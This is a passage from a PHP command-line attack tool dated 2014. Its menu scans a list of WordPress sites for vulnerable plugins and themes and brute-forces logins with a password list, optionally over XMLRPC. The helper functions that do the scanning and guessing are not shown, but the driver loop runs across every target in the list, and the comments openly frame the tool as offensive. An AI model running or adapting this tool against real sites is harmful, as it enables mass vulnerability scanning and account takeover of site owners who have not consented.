// accepted values; "y" and "yes" are the accepted confirmations further down.
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
$what = trim(fgets(STDIN));
$choice = array("1","2","3","4");
$yesno = array("y","yes");
  638. if(in_array($what, $choice)){
  639.     if($what == "1"){
  640.         print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
  641.         $list = trim(fgets(STDIN));
  642.         if(!is_file($list)) {
  643.             #######################
  644.            ##  CAN'T LOAD LIST  ##
  645.            #######################
  646.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  647.             ##############
  648.            ##   EXIT   ##
  649.            ##############
  650.            bye();
  651.         }
  652.         #################
  653.        ##   POOYAA!   ##
  654.        #################
  655.        print "\n[+] Scanning begun";
  656.         $file = file_get_contents($list);
  657.         $plugins = explode("\n", $file);
  658.         print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
  659.         $targets = file_get_contents('wp.txt');
  660.         $r00t3rz = explode("\n", $targets);
  661.         print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
  662.         $key = strtolower(trim(fgets(STDIN)));
  663.         if(in_array($key, $yesno)){
  664.             $key = "set";
  665.         }else{
  666.             $key = NULL;
  667.         }
  668.         foreach($r00t3rz as $z){
  669.             if(!$z == ""){
  670.                 xp_scanner($z, $list, $key);
  671.             }
  672.         }
  673.         /*
  674.         #################
  675.         ##   Results   ##
  676.         #################
  677.         print "\n[+] Scanning finished!";
  678.         $vul = file_get_contents('vuln.txt');
  679.         $able = explode("\n", $vul);
  680.         print '[ '.count($able).' Website ]\n';
  681.         foreach($able as $gxp){
  682.             if(!$gxp==""){
  683.                 print "\n\t[!] $gxp";
  684.             }
  685.         }
  686.         */
  687.         bye();
  688.     } elseif($what == "2") {
  689.         print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
  690.         #################
  691.        ##   POOYAA!   ##
  692.        #################
  693.        print "\n[+] Scanning begun";
  694.         $targets = file_get_contents('wp.txt');
  695.         $r00t3rz = explode("\n", $targets);
  696.         foreach($r00t3rz as $z){
  697.             if(!$z == ""){
  698.                 xp_get_plugins($z);
  699.                 xp_get_themes($z);
  700.             }
  701.         }
  702.         #################
  703.        ##   Results   ##
  704.        #################
  705.        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
  706.         $vulpl = file_get_contents('vulpl.txt');
  707.         $getpl = explode("\n", $vulpl);
  708.         #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
  709.        foreach($getpl as $vul){
  710.             if(!$vul==""){
  711.                 print "\n\t$vul";
  712.             }
  713.         }
  714.         bye();
  715.     } elseif($what == "3") {
  716.         print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
  717.         $list = trim(fgets(STDIN));
  718.         if(!is_file($list)) {
  719.             #######################
  720.            ##  CAN'T LOAD LIST  ##
  721.            #######################
  722.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  723.             ##############
  724.            ##   EXIT   ##
  725.            ##############
  726.            bye();
  727.         }
  728.         #################
  729.        ##   POOYAA!   ##
  730.        #################
  731.        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
  732.         $xmlrpc = strtolower(trim(fgets(STDIN)));
  733.         if(in_array($xmlrpc, $yesno)){
  734.             $xml = "set";
  735.         }else{
  736.             $xml = NULL;
  737.         }
  738.         print "\n[+] Bruting begun";
  739.         $targets = file_get_contents('wp.txt');
  740.         $xp = explode("\n", $targets);
  741.         foreach($xp as $z){
  742.             if(!$z == ""){
  743.                 xp_get_user($z, $list, $xml);
  744.             }
  745.         }
  746.         bye();
  747.     } else {
  748.         ######################
  749.        ##  OOH KILL'EM =P  ##
  750.        ######################
  751.        bye();
  752.     }
  753. }
  754. #####################################
  755. ##  © ALM3REFH.COM 2014 - CHEERS!  ##
  756. #####################################
  757. ?>